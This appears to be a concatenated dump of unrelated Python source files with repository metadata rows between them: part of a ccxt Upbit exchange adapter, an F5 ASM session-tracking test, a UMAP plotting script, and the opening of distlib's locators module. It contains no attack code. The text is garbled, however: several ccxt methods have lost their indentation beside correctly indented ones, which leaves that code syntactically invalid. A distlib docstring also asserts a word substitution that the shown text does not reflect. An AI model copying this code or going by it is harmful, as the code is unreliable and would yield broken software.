# 'executed_volume': '0.0',
# 'trades_count': 0
# }
#
return self.parse_order(response)
    async def cancel_order(self, id, symbol=None, params={}):
        """Cancel an open order by its uuid.

        :param str id: the order uuid
        :param str symbol: unused - Upbit cancels by uuid alone
        :param dict params: extra parameters merged into the API request
        :returns dict: unified order structure of the canceled order
        """
        await self.load_markets()
        request = {
            'uuid': id,
        }
        response = await self.privateDeleteOrder(self.extend(request, params))
        #
        #     {
        #         "uuid": "cdd92199-2897-4e14-9448-f923320408ad",
        #         "side": "bid",
        #         "ord_type": "limit",
        #         "price": "100.0",
        #         "state": "wait",
        #         "market": "KRW-BTC",
        #         "created_at": "2018-04-10T15:42:23+09:00",
        #         "volume": "0.01",
        #         "remaining_volume": "0.01",
        #         "reserved_fee": "0.0015",
        #         "remaining_fee": "0.0015",
        #         "paid_fee": "0.0",
        #         "locked": "1.0015",
        #         "executed_volume": "0.0",
        #         "trades_count": 0
        #     }
        #
        return self.parse_order(response)
    async def fetch_deposits(self, code=None, since=None, limit=None, params={}):
        """Fetch the deposit history, optionally filtered by currency.

        :param str code: unified currency code, or None for all currencies
        :param int since: unused by the endpoint, applied as a filter in parse_transactions
        :param int limit: max number of records(endpoint default is 100)
        :param dict params: extra parameters merged into the API request
        :returns list[dict]: unified transaction structures
        """
        await self.load_markets()
        request = {
            # 'page': 1,
            # 'order_by': 'asc',  # 'desc'
        }
        currency = None
        if code is not None:
            currency = self.currency(code)
            request['currency'] = currency['id']
        if limit is not None:
            request['limit'] = limit  # default is 100
        response = await self.privateGetDeposits(self.extend(request, params))
        #
        #     [
        #         {
        #             "type": "deposit",
        #             "uuid": "94332e99-3a87-4a35-ad98-28b0c969f830",
        #             "currency": "KRW",
        #             "txid": "9e37c537-6849-4c8b-a134-57313f5dfc5a",
        #             "state": "ACCEPTED",
        #             "created_at": "2017-12-08T15:38:02+09:00",
        #             "done_at": "2017-12-08T15:38:02+09:00",
        #             "amount": "100000.0",
        #             "fee": "0.0"
        #         },
        #         ...,
        #     ]
        #
        return self.parse_transactions(response, currency, since, limit)
    async def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):
        """Fetch the withdrawal history, optionally filtered by currency.

        :param str code: unified currency code, or None for all currencies
        :param int since: unused by the endpoint, applied as a filter in parse_transactions
        :param int limit: max number of records(endpoint default is 100)
        :param dict params: extra parameters merged into the API request
        :returns list[dict]: unified transaction structures
        """
        await self.load_markets()
        request = {
            # 'state': 'submitting',  # 'submitted', 'almost_accepted', 'rejected', 'accepted', 'processing', 'done', 'canceled'
        }
        currency = None
        if code is not None:
            currency = self.currency(code)
            request['currency'] = currency['id']
        if limit is not None:
            request['limit'] = limit  # default is 100
        response = await self.privateGetWithdraws(self.extend(request, params))
        #
        #     [
        #         {
        #             "type": "withdraw",
        #             "uuid": "9f432943-54e0-40b7-825f-b6fec8b42b79",
        #             "currency": "BTC",
        #             "txid": null,
        #             "state": "processing",
        #             "created_at": "2018-04-13T11:24:01+09:00",
        #             "done_at": null,
        #             "amount": "0.01",
        #             "fee": "0.0",
        #             "krw_amount": "80420.0"
        #         },
        #         ...,
        #     ]
        #
        return self.parse_transactions(response, currency, since, limit)
def parse_transaction_status(self, status):
statuses = {
'ACCEPTED': 'ok', # deposits
# withdrawals:
'submitting': 'pending', # 처리 중
'submitted': 'pending', # 처리 완료
'almost_accepted': 'pending', # 출금대기중
'rejected': 'failed', # 거부
'accepted': 'pending', # 승인됨
'processing': 'pending', # 처리 중
'done': 'ok', # 완료
'canceled': 'canceled', # 취소됨
}
return self.safe_string(statuses, status, status)
    def parse_transaction(self, transaction, currency=None):
        """Convert a raw deposit or withdrawal record into the unified
        transaction format.

        :param dict transaction: raw transaction structure
        :param dict currency: optional currency structure(unused, the record's
            own 'currency' field is authoritative)
        :returns dict: unified transaction
        """
        #
        # fetchDeposits
        #
        #     {
        #         "type": "deposit",
        #         "uuid": "94332e99-3a87-4a35-ad98-28b0c969f830",
        #         "currency": "KRW",
        #         "txid": "9e37c537-6849-4c8b-a134-57313f5dfc5a",
        #         "state": "ACCEPTED",
        #         "created_at": "2017-12-08T15:38:02+09:00",
        #         "done_at": "2017-12-08T15:38:02+09:00",
        #         "amount": "100000.0",
        #         "fee": "0.0"
        #     }
        #
        # fetchWithdrawals
        #
        #     {
        #         "type": "withdraw",
        #         "uuid": "9f432943-54e0-40b7-825f-b6fec8b42b79",
        #         "currency": "BTC",
        #         "txid": "cd81e9b45df8da29f936836e58c907a106057e454a45767a7b06fcb19b966bba",
        #         "state": "processing",
        #         "created_at": "2018-04-13T11:24:01+09:00",
        #         "done_at": null,
        #         "amount": "0.01",
        #         "fee": "0.0",
        #         "krw_amount": "80420.0"
        #     }
        #
        id = self.safe_string(transaction, 'uuid')
        amount = self.safe_float(transaction, 'amount')
        address = None  # not present in the data structure received from the exchange
        tag = None  # not present in the data structure received from the exchange
        txid = self.safe_string(transaction, 'txid')
        updated = self.parse8601(self.safe_string(transaction, 'done_at'))
        # NOTE(review): the default passed here is a millisecond int(or None),
        # which parse8601 cannot parse - if 'created_at' is ever absent the
        # timestamp will effectively be None; confirm intent
        timestamp = self.parse8601(self.safe_string(transaction, 'created_at', updated))
        type = self.safe_string(transaction, 'type')
        if type == 'withdraw':
            type = 'withdrawal'
        currencyId = self.safe_string(transaction, 'currency')
        code = self.safe_currency_code(currencyId)
        status = self.parse_transaction_status(self.safe_string(transaction, 'state'))
        feeCost = self.safe_float(transaction, 'fee')
        return {
            'info': transaction,
            'id': id,
            'currency': code,
            'amount': amount,
            'address': address,
            'tag': tag,
            'status': status,
            'type': type,
            'updated': updated,
            'txid': txid,
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'fee': {
                'currency': code,
                'cost': feeCost,
            },
        }
def parse_order_status(self, status):
statuses = {
'wait': 'open',
'done': 'closed',
'cancel': 'canceled',
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market=None):
#
# {
# "uuid": "a08f09b1-1718-42e2-9358-f0e5e083d3ee",
# "side": "bid",
# "ord_type": "limit",
# "price": "17417000.0",
# "state": "done",
# "market": "KRW-BTC",
# "created_at": "2018-04-05T14:09:14+09:00",
# "volume": "1.0",
# "remaining_volume": "0.0",
# "reserved_fee": "26125.5",
# "remaining_fee": "25974.0",
# "paid_fee": "151.5",
# "locked": "17341974.0",
# "executed_volume": "1.0",
# "trades_count": 2,
# "trades": [
# {
# "market": "KRW-BTC",
# "uuid": "78162304-1a4d-4524-b9e6-c9a9e14d76c3",
# "price": "101000.0",
# "volume": "0.77368323",
# "funds": "78142.00623",
# "ask_fee": "117.213009345",
# "bid_fee": "117.213009345",
# "created_at": "2018-04-05T14:09:15+09:00",
# "side": "bid",
# },
# {
# "market": "KRW-BTC",
# "uuid": "f73da467-c42f-407d-92fa-e10d86450a20",
# "price": "101000.0",
# "volume": "0.22631677",
# "funds": "22857.99377",
# "ask_fee": "34.286990655", # missing in market orders
# "bid_fee": "34.286990655", # missing in market orders
# "created_at": "2018-04-05T14:09:15+09:00", # missing in market orders
# "side": "bid",
# },
# ],
# }
#
id = self.safe_string(order, 'uuid')
side = self.safe_string(order, 'side')
if side == 'bid':
side = 'buy'
else:
side = 'sell'
type = self.safe_string(order, 'ord_type')
timestamp = self.parse8601(self.safe_string(order, 'created_at'))
status = self.parse_order_status(self.safe_string(order, 'state'))
lastTradeTimestamp = None
price = self.safe_float(order, 'price')
amount = self.safe_float(order, 'volume')
remaining = self.safe_float(order, 'remaining_volume')
filled = self.safe_float(order, 'executed_volume')
cost = None
if type == 'price':
type = 'market'
cost = price
price = None
average = None
fee = None
feeCost = self.safe_float(order, 'paid_fee')
feeCurrency = None
marketId = self.safe_string(order, 'market')
market = self.safe_value(self.markets_by_id, marketId)
symbol = None
if market is not None:
symbol = market['symbol']
feeCurrency = market['quote']
else:
baseId, quoteId = marketId.split('-')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
feeCurrency = quote
trades = self.safe_value(order, 'trades', [])
trades = self.parse_trades(trades, market, None, None, {'order': id})
numTrades = len(trades)
if numTrades > 0:
# the timestamp in fetchOrder trades is missing
lastTradeTimestamp = trades[numTrades - 1]['timestamp']
getFeesFromTrades = False
if feeCost is None:
getFeesFromTrades = True
feeCost = 0
cost = 0
for i in range(0, numTrades):
trade = trades[i]
cost = self.sum(cost, trade['cost'])
if getFeesFromTrades:
tradeFee = self.safe_value(trades[i], 'fee', {})
tradeFeeCost = self.safe_float(tradeFee, 'cost')
if tradeFeeCost is not None:
feeCost = self.sum(feeCost, tradeFeeCost)
average = cost / filled
if feeCost is not None:
fee = {
'currency': feeCurrency,
'cost': feeCost,
}
result = {
'info': order,
'id': id,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': lastTradeTimestamp,
'symbol': symbol,
'type': type,
'side': side,
'price': price,
'cost': cost,
'average': average,
'amount': amount,
'filled': filled,
'remaining': remaining,
'status': status,
'fee': fee,
'trades': trades,
}
return result
    async def fetch_orders_by_state(self, state, symbol=None, since=None, limit=None, params={}):
        """Fetch orders filtered by an exchange state('wait'/'done'/'cancel').

        Shared implementation behind fetchOpenOrders, fetchClosedOrders and
        fetchCanceledOrders.

        :param str state: exchange order state to filter by
        :param str symbol: optional unified market symbol
        :param int since: unused by the endpoint, applied as a filter in parse_orders
        :param int limit: applied as a filter in parse_orders
        :param dict params: extra parameters merged into the API request
        :returns list[dict]: unified orders
        """
        await self.load_markets()
        request = {
            # 'market': self.market_id(symbol),
            'state': state,
            # 'page': 1,
            # 'order_by': 'asc',
        }
        market = None
        if symbol is not None:
            market = self.market(symbol)
            request['market'] = market['id']
        response = await self.privateGetOrders(self.extend(request, params))
        #
        #     [
        #         {
        #             "uuid": "a08f09b1-1718-42e2-9358-f0e5e083d3ee",
        #             "side": "bid",
        #             "ord_type": "limit",
        #             "price": "17417000.0",
        #             "state": "done",
        #             "market": "KRW-BTC",
        #             "created_at": "2018-04-05T14:09:14+09:00",
        #             "volume": "1.0",
        #             "remaining_volume": "0.0",
        #             "reserved_fee": "26125.5",
        #             "remaining_fee": "25974.0",
        #             "paid_fee": "151.5",
        #             "locked": "17341974.0",
        #             "executed_volume": "1.0",
        #             "trades_count":2
        #         },
        #     ]
        #
        return self.parse_orders(response, market, since, limit)
    async def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
        """Fetch all open('wait') orders, optionally filtered by symbol."""
        return await self.fetch_orders_by_state('wait', symbol, since, limit, params)
    async def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
        """Fetch all filled('done') orders, optionally filtered by symbol."""
        return await self.fetch_orders_by_state('done', symbol, since, limit, params)
    async def fetch_canceled_orders(self, symbol=None, since=None, limit=None, params={}):
        """Fetch all canceled('cancel') orders, optionally filtered by symbol."""
        return await self.fetch_orders_by_state('cancel', symbol, since, limit, params)
    async def fetch_order(self, id, symbol=None, params={}):
        """Fetch a single order(including its fills) by uuid.

        :param str id: the order uuid
        :param str symbol: unused - Upbit looks up by uuid alone
        :param dict params: extra parameters merged into the API request
        :returns dict: unified order structure with trades
        """
        await self.load_markets()
        request = {
            'uuid': id,
        }
        response = await self.privateGetOrder(self.extend(request, params))
        #
        #     {
        #         "uuid": "a08f09b1-1718-42e2-9358-f0e5e083d3ee",
        #         "side": "bid",
        #         "ord_type": "limit",
        #         "price": "17417000.0",
        #         "state": "done",
        #         "market": "KRW-BTC",
        #         "created_at": "2018-04-05T14:09:14+09:00",
        #         "volume": "1.0",
        #         "remaining_volume": "0.0",
        #         "reserved_fee": "26125.5",
        #         "remaining_fee": "25974.0",
        #         "paid_fee": "151.5",
        #         "locked": "17341974.0",
        #         "executed_volume": "1.0",
        #         "trades_count": 2,
        #         "trades": [
        #             {
        #                 "market": "KRW-BTC",
        #                 "uuid": "78162304-1a4d-4524-b9e6-c9a9e14d76c3",
        #                 "price": "101000.0",
        #                 "volume": "0.77368323",
        #                 "funds": "78142.00623",
        #                 "ask_fee": "117.213009345",
        #                 "bid_fee": "117.213009345",
        #                 "created_at": "2018-04-05T14:09:15+09:00",
        #                 "side": "bid"
        #             },
        #             {
        #                 "market": "KRW-BTC",
        #                 "uuid": "f73da467-c42f-407d-92fa-e10d86450a20",
        #                 "price": "101000.0",
        #                 "volume": "0.22631677",
        #                 "funds": "22857.99377",
        #                 "ask_fee": "34.286990655",
        #                 "bid_fee": "34.286990655",
        #                 "created_at": "2018-04-05T14:09:15+09:00",
        #                 "side": "bid"
        #             }
        #         ]
        #     }
        #
        return self.parse_order(response)
def parse_deposit_addresses(self, addresses):
result = []
for i in range(0, len(addresses)):
result.append(self.parse_deposit_address(addresses[i]))
return result
    async def fetch_deposit_addresses(self, codes=None, params={}):
        """Fetch deposit addresses for all currencies.

        :param list[str] codes: unused - the endpoint returns all addresses
        :param dict params: extra parameters merged into the API request
        :returns list[dict]: unified deposit-address structures
        """
        await self.load_markets()
        response = await self.privateGetDepositsCoinAddresses(params)
        #
        #     [
        #         {
        #             "currency": "BTC",
        #             "deposit_address": "3EusRwybuZUhVDeHL7gh3HSLmbhLcy7NqD",
        #             "secondary_address": null
        #         },
        #         {
        #             "currency": "ETH",
        #             "deposit_address": "0x0d73e0a482b8cf568976d2e8688f4a899d29301c",
        #             "secondary_address": null
        #         },
        #         {
        #             "currency": "XRP",
        #             "deposit_address": "rN9qNpgnBaZwqCg8CvUZRPqCcPPY7wfWep",
        #             "secondary_address": "3057887915"
        #         }
        #     ]
        #
        return self.parse_deposit_addresses(response)
def parse_deposit_address(self, depositAddress, currency=None):
#
# {
# "currency": "BTC",
# "deposit_address": "3EusRwybuZUhVDeHL7gh3HSLmbhLcy7NqD",
# "secondary_address": null
# }
#
address = self.safe_string(depositAddress, 'deposit_address')
tag = self.safe_string(depositAddress, 'secondary_address')
currencyId = self.safe_string(depositAddress, 'currency')
code = self.safe_currency_code(currencyId)
self.check_address(address)
return {
'currency': code,
'address': address,
'tag': tag,
'info': depositAddress,
}
async def fetch_deposit_address(self, code, params={}):
await self.load_markets()
currency = self.currency(code)
response = await self.privateGetDepositsCoinAddress(self.extend({
'currency': currency['id'],
}, params))
#
# {
# "currency": "BTC",
# "deposit_address": "3EusRwybuZUhVDeHL7gh3HSLmbhLcy7NqD",
# "secondary_address": null
# }
#
return self.parse_deposit_address(response)
    async def create_deposit_address(self, code, params={}):
        """Request the creation of a deposit address for a currency.

        Address generation is asynchronous on Upbit's side - the endpoint may
        respond with either a confirmation message(address not ready yet, in
        which case 'address' is None) or the generated address itself.

        :param str code: unified currency code
        :param dict params: extra parameters merged into the API request
        :returns dict: unified deposit-address structure
        """
        await self.load_markets()
        currency = self.currency(code)
        request = {
            'currency': currency['id'],
        }
        response = await self.fetch_deposit_address(code, self.extend(request, params))
        #
        # https://docs.upbit.com/v1.0/reference#%EC%9E%85%EA%B8%88-%EC%A3%BC%EC%86%8C-%EC%83%9D%EC%84%B1-%EC%9A%94%EC%B2%AD
        # can be any of the two responses:
        #
        #     {
        #         "success" : True,
        #         "message" : "Creating BTC deposit address."
        #     }
        #
        #     {
        #         "currency": "BTC",
        #         "deposit_address": "3EusRwybuZUhVDeHL7gh3HSLmbhLcy7NqD",
        #         "secondary_address": null
        #     }
        #
        message = self.safe_string(response, 'message')
        if message is not None:
            # generation still in progress - no address available yet
            return {
                'currency': code,
                'address': None,
                'tag': None,
                'info': response,
            }
        return self.parse_deposit_address(response)
    async def withdraw(self, code, amount, address, tag=None, params={}):
        """Withdraw funds to an external address.

        KRW withdrawals go through a dedicated fiat endpoint that takes only
        the amount; coin withdrawals additionally need currency, address and
        an optional secondary address(tag/memo).

        :param str code: unified currency code
        :param float amount: amount to withdraw
        :param str address: destination address
        :param str tag: optional secondary address(memo/tag)
        :param dict params: extra parameters merged into the API request
        :returns dict: unified transaction structure
        """
        self.check_address(address)
        await self.load_markets()
        currency = self.currency(code)
        request = {
            'amount': amount,
        }
        method = 'privatePostWithdraws'
        if code != 'KRW':
            method += 'Coin'
            request['currency'] = currency['id']
            request['address'] = address
            if tag is not None:
                request['secondary_address'] = tag
        else:
            method += 'Krw'
        response = await getattr(self, method)(self.extend(request, params))
        #
        #     {
        #         "type": "withdraw",
        #         "uuid": "9f432943-54e0-40b7-825f-b6fec8b42b79",
        #         "currency": "BTC",
        #         "txid": "ebe6937b-130e-4066-8ac6-4b0e67f28adc",
        #         "state": "processing",
        #         "created_at": "2018-04-13T11:24:01+09:00",
        #         "done_at": null,
        #         "amount": "0.01",
        #         "fee": "0.0",
        #         "krw_amount": "80420.0"
        #     }
        #
        return self.parse_transaction(response)
    def nonce(self):
        # millisecond timestamp used as the nonce inside the signed JWT payload
        return self.milliseconds()
    def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
        """Build the URL, headers and body for an API request.

        Private endpoints are authenticated with a JWT(access key + nonce,
        plus the urlencoded query when present) passed as a Bearer token.

        :returns dict: {'url', 'method', 'body', 'headers'}
        """
        url = self.implode_params(self.urls['api'], {
            'hostname': self.hostname,
        })
        url += '/' + self.version + '/' + self.implode_params(path, params)
        # params consumed by the path template must not be sent again
        query = self.omit(params, self.extract_params(path))
        if method == 'GET':
            if query:
                url += '?' + self.urlencode(query)
        if api == 'private':
            self.check_required_credentials()
            nonce = self.nonce()
            request = {
                'access_key': self.apiKey,
                'nonce': nonce,
            }
            if query:
                # the signed JWT must cover the urlencoded query string
                request['query'] = self.urlencode(query)
            jwt = self.jwt(request, self.encode(self.secret))
            headers = {
                'Authorization': 'Bearer ' + jwt,
            }
            if method != 'GET':
                # non-GET private requests send the params as a JSON body
                body = self.json(params)
                headers['Content-Type'] = 'application/json'
        return {'url': url, 'method': method, 'body': body, 'headers': headers}
    def handle_errors(self, httpCode, reason, url, method, headers, body, response, requestHeaders, requestBody):
        """Map API error payloads onto ccxt exception classes.

        Looks up the error's ``message`` and ``name`` against the exchange's
        ``exceptions['exact']`` and ``exceptions['broad']`` tables and raises
        the matching exception, falling back to a generic ExchangeError.
        """
        if response is None:
            return  # fallback to default error handler
        #
        # Example error payloads:
        #
        # {'error': {'message': "Missing request parameter error. Check the required parametersnot ", 'name': 400} },
        # {'error': {'message': "side is missing, side does not have a valid value", 'name': "validation_error"} },
        # {'error': {'message': "개인정보 제 3자 제공 동의가 필요합니다.", 'name': "thirdparty_agreement_required"} },
        # {'error': {'message': "권한이 부족합니다.", 'name': "out_of_scope"} },
        # {'error': {'message': "주문을 찾지 못했습니다.", 'name': "order_not_found"} },
        # {'error': {'message': "주문가능한 금액(ETH)이 부족합니다.", 'name': "insufficient_funds_ask"} },
        # {'error': {'message': "주문가능한 금액(BTC)이 부족합니다.", 'name': "insufficient_funds_bid"} },
        # {'error': {'message': "잘못된 엑세스 키입니다.", 'name': "invalid_access_key"} },
        # {'error': {'message': "Jwt 토큰 검증에 실패했습니다.", 'name': "jwt_verification"} }
        #
        error = self.safe_value(response, 'error')
        if error is not None:
            message = self.safe_string(error, 'message')
            name = self.safe_string(error, 'name')
            feedback = self.id + ' ' + self.json(response)
            exact = self.exceptions['exact']
            if message in exact:
                raise exact[message](feedback)
            if name in exact:
                raise exact[name](feedback)
            broad = self.exceptions['broad']
            # NOTE(review): camelCase helper name — confirm the base Exchange
            # exposes findBroadlyMatchedKey (vs find_broadly_matched_key).
            broadKey = self.findBroadlyMatchedKey(broad, message)
            if broadKey is not None:
                raise broad[broadKey](feedback)
            broadKey = self.findBroadlyMatchedKey(broad, name)
            if broadKey is not None:
                raise broad[broadKey](feedback)
            raise ExchangeError(feedback)  # unknown message
| [
"ruiliang.guo@homiex.com"
] | ruiliang.guo@homiex.com |
0030964604d33aa135c50d750f448c4688055868 | 3256af0d6c19732bb84b256a9f792aaf7f3d901a | /f5/bigip/tm/asm/policies/test/functional/test_session_tracking.py | 787fdfeaad06ce0b34a159e408f247c5a80fe15b | [
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] | permissive | F5Networks/f5-common-python | 73e33ea489d989399d205077163f24ce584d83b9 | 3050df0079c2426af99b9a1b8f93d0b512468ff4 | refs/heads/development | 2023-08-29T10:11:23.713392 | 2022-09-21T02:45:03 | 2022-09-21T02:45:03 | 45,062,555 | 286 | 180 | Apache-2.0 | 2023-05-12T23:13:03 | 2015-10-27T18:48:06 | Python | UTF-8 | Python | false | false | 2,340 | py | # Copyright 2017 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
from distutils.version import LooseVersion
from f5.sdk_exception import UnsupportedOperation
@pytest.mark.skipif(
    LooseVersion(pytest.config.getoption('--release')) < LooseVersion('11.6.0'),
    reason='This collection is fully implemented on 11.6.0 or greater.'
)
class TestSessionTracking(object):
    """Exercise the policy's session-tracking (session awareness) resource."""

    def test_update_raises(self, policy):
        # The resource is read/modify only; update() must be rejected.
        with pytest.raises(UnsupportedOperation):
            policy.session_tracking.update()

    def test_load(self, policy):
        loaded = policy.session_tracking.load()
        assert loaded.kind == 'tm:asm:policies:session-tracking:session-awareness-settingsstate'
        assert loaded.sessionTrackingConfiguration['enableSessionAwareness'] is False
        # Flip the flag and confirm the change is reflected locally ...
        loaded.modify(sessionTrackingConfiguration={'enableSessionAwareness': True})
        assert loaded.sessionTrackingConfiguration['enableSessionAwareness'] is True
        # ... and that a fresh load agrees with the modified resource.
        reloaded = policy.session_tracking.load()
        assert reloaded.kind == loaded.kind
        assert reloaded.sessionTrackingConfiguration == loaded.sessionTrackingConfiguration

    def test_refresh(self, policy):
        first = policy.session_tracking.load()
        assert first.kind == 'tm:asm:policies:session-tracking:session-awareness-settingsstate'
        assert first.sessionTrackingConfiguration['enableSessionAwareness'] is False
        second = policy.session_tracking.load()
        assert second.kind == first.kind
        assert second.sessionTrackingConfiguration == first.sessionTrackingConfiguration
        # Modify through one handle, then refresh() the other and compare.
        second.modify(sessionTrackingConfiguration={'enableSessionAwareness': True})
        assert second.sessionTrackingConfiguration['enableSessionAwareness'] is True
        first.refresh()
        assert first.sessionTrackingConfiguration == second.sessionTrackingConfiguration
| [
"caphrim007@gmail.com"
] | caphrim007@gmail.com |
3dacd79b61a449dd121c4692ecef1e73c0a3611d | 779291cb83ec3cab36d8bb66ed46b3afd4907f95 | /library_strategy-wf/scripts/plot_umap_library_strategy.py | 8893a1ca40907af4f128ed47502fc90d159e6127 | [] | no_license | Shengqian95/ncbi_remap | ac3258411fda8e9317f3cdf951cc909cc0f1946e | 3f2099058bce5d1670a672a69c13efd89d538cd1 | refs/heads/master | 2023-05-22T06:17:57.900135 | 2020-11-01T17:16:54 | 2020-11-01T17:16:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,713 | py | """UMAP of Library Strategy"""
import sys
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
sys.path.insert(0, "../src")
from ncbi_remap.plotting import style_use
# Library strategies rendered as distinct layers; anything else collapses to "Other".
CATEGORIES = ["RNA-Seq", "EST", "WGS", "ChIP-Seq", "Other"]
# Matplotlib color-cycle entries aligned 1:1 with CATEGORIES ("Other" is gray).
COLORS = ["C0", "C1", "C2", "C4", "lightgray"]
# Draw order aligned 1:1 with CATEGORIES: larger values are drawn on top.
ZORDER = [4, 3, 2, 1, 0]
# Shared kwargs for every scatter call; rasterized keeps vector output small.
SCATTER_STYLE = dict(s=10, edgecolors="w", linewidths=0.2, rasterized=True)
def main():
    """Render the UMAP scatter plot and save it to the snakemake output path."""
    style_use(snakemake.params.get("style", "sra"))
    embeddings = wrangle_data()
    # plot() returns the Axes, but it is not needed here; the previous
    # assignment to an unused local `ax` has been dropped.
    plot(embeddings)
    plt.savefig(snakemake.output[0])
def wrangle_data():
    """Join the UMAP coordinates with library-strategy labels.

    Strategies outside CATEGORIES are collapsed to "Other" so the plot
    legend stays small.
    """
    strategies = pd.read_parquet(snakemake.input.labels).library_strategy.squeeze()
    collapsed = strategies.map(lambda strategy: strategy if strategy in CATEGORIES else "Other")
    embeddings = pd.read_parquet(snakemake.input.umap)
    return embeddings.join(collapsed)
def plot(embeddings):
    """Scatter the 2-D embedding, one layer per library strategy, and return the Axes."""
    for strategy, color, depth in zip(CATEGORIES, COLORS, ZORDER):
        layer = embeddings[embeddings["library_strategy"] == strategy]
        plt.scatter(layer.UMAP1, layer.UMAP2, c=color, label=strategy, zorder=depth, **SCATTER_STYLE)
    ax = plt.gca()
    ax.set(xlabel="UMAP 1", ylabel="UMAP 2")
    # Strip the frame and hide both axes — the UMAP coordinates are unitless.
    sns.despine(ax=ax, left=True, bottom=True)
    for axis in (ax.yaxis, ax.xaxis):
        axis.set_visible(False)
    plt.legend(loc="upper left")
    return ax
if __name__ == "__main__":
    # When run outside Snakemake (e.g. interactively), substitute a mock
    # `snakemake` object pointing at the default input locations.
    if "snakemake" not in locals() or not hasattr(snakemake, "scriptdir"):
        from ncbi_remap.mock import MockSnake

        snakemake = MockSnake(
            input=dict(
                umap="../../output/library_strategy-wf/umap_prealn_features.parquet",
                labels="../../output/library_strategy-wf/sra_strategy_selection.parquet",
            ),
            output="",
        )
    main()
| [
"justin.m.fear@gmail.com"
] | justin.m.fear@gmail.com |
86ccac53d2e8d1436a9fb4a079327e43ed7003ff | 10e8fa6e43a54b3bbb89326a7d5786d50a625551 | /01. Defining Classes/venv/Lib/site-packages/pip-19.0.3-py3.8.egg/pip/_vendor/distlib/locators.py | de2440059a7e4ad45ca927e69469f28ad6651090 | [] | no_license | ramona-2020/Python-OOP | cbc7e5fadfdc907e51c83313e0ffb1f4f5f83f70 | 7404908f50d30c533f0fca2fd08d0290526686a5 | refs/heads/master | 2023-03-20T18:43:18.389720 | 2020-06-07T15:20:00 | 2020-06-07T15:20:00 | 523,400,905 | 1 | 0 | null | 2022-08-10T15:38:09 | 2022-08-10T15:38:08 | null | UTF-8 | Python | false | false | 51,828 | py | # -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2015 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import gzip
from io import BytesIO
import json
import logging
import os
import posixpath
import re
try:
import threading
except ImportError: # pragma: no cover
import dummy_threading as threading
import zlib
from . import DistlibException
from .compat import (urljoin, urlparse, urlunparse, url2pathname, pathname2url,
queue, quote, unescape, string_types, build_opener,
HTTPRedirectHandler as BaseRedirectHandler, text_type,
Request, HTTPError, URLError)
from .database import Distribution, DistributionPath, make_dist
from .metadata import Metadata, MetadataInvalidError
from .util import (cached_property, parse_credentials, ensure_slash,
split_filename, get_project_data, parse_requirement,
parse_name_and_version, ServerProxy, normalize_name)
from .version import get_scheme, UnsupportedVersionError
from .wheel import Wheel, is_compatible
logger = logging.getLogger(__name__)

# Matches "<algo>=<hexdigest>" fragments appended to download URLs.
HASHER_HASH = re.compile(r'^(\w+)=([a-f0-9]+)')
# Extracts the charset parameter from a Content-Type header value.
CHARSET = re.compile(r';\s*charset\s*=\s*(.*)\s*$', re.I)
# Content types treated as HTML pages worth scraping for links.
HTML_CONTENT_TYPE = re.compile('text/html|application/x(ht)?ml')
DEFAULT_INDEX = 'https://pypi.python.org/pypi'
def get_all_distribution_names(url=None):
    """Return every distribution name known to the index at *url*.

    :param url: The URL of the index; defaults to ``DEFAULT_INDEX``.
    :return: A list of all known distribution names.
    """
    index_url = DEFAULT_INDEX if url is None else url
    proxy = ServerProxy(index_url, timeout=3.0)
    try:
        return proxy.list_packages()
    finally:
        # ServerProxy exposes transport methods via a call-style accessor.
        proxy('close')()
class RedirectHandler(BaseRedirectHandler):
    """
    A class to work around a bug in some Python 3.2.x releases.
    """
    # There's a bug in the base version for some 3.2.x
    # (e.g. 3.2.2 on Ubuntu Oneiric). If a Location header
    # returns e.g. /abc, it bails because it says the scheme ''
    # is bogus, when actually it should use the request's
    # URL for the scheme. See Python issue #13696.
    def http_error_302(self, req, fp, code, msg, headers):
        # Some servers (incorrectly) return multiple Location headers
        # (so probably same goes for URI). Use first header.
        newurl = None
        for key in ('location', 'uri'):
            if key in headers:
                newurl = headers[key]
                break
        if newurl is None:  # pragma: no cover
            return
        urlparts = urlparse(newurl)
        if urlparts.scheme == '':
            # Scheme-less (relative) redirect: resolve it against the
            # original request URL and patch the header in place.
            newurl = urljoin(req.get_full_url(), newurl)
            if hasattr(headers, 'replace_header'):
                headers.replace_header(key, newurl)
            else:
                headers[key] = newurl
        return BaseRedirectHandler.http_error_302(self, req, fp, code, msg,
                                                  headers)

    # All other redirect codes are handled identically.
    http_error_301 = http_error_303 = http_error_307 = http_error_302
class Locator(object):
    """
    A base class for locators - things that locate distributions.

    Note: this copy of the file had the word "project" globally replaced by
    "pokemon" in docstrings and in one debug message; the upstream distlib
    wording is restored here.
    """
    source_extensions = ('.tar.gz', '.tar.bz2', '.tar', '.zip', '.tgz', '.tbz')
    binary_extensions = ('.egg', '.exe', '.whl')
    excluded_extensions = ('.pdf',)

    # A list of tags indicating which wheels you want to match. The default
    # value of None matches against the tags compatible with the running
    # Python. If you want to match other values, set wheel_tags on a locator
    # instance to a list of tuples (pyver, abi, arch) which you want to match.
    wheel_tags = None

    downloadable_extensions = source_extensions + ('.whl',)

    def __init__(self, scheme='default'):
        """
        Initialise an instance.
        :param scheme: Because locators look for most recent versions, they
                       need to know the version scheme to use. This specifies
                       the current PEP-recommended scheme - use ``'legacy'``
                       if you need to support existing distributions on PyPI.
        """
        self._cache = {}
        self.scheme = scheme
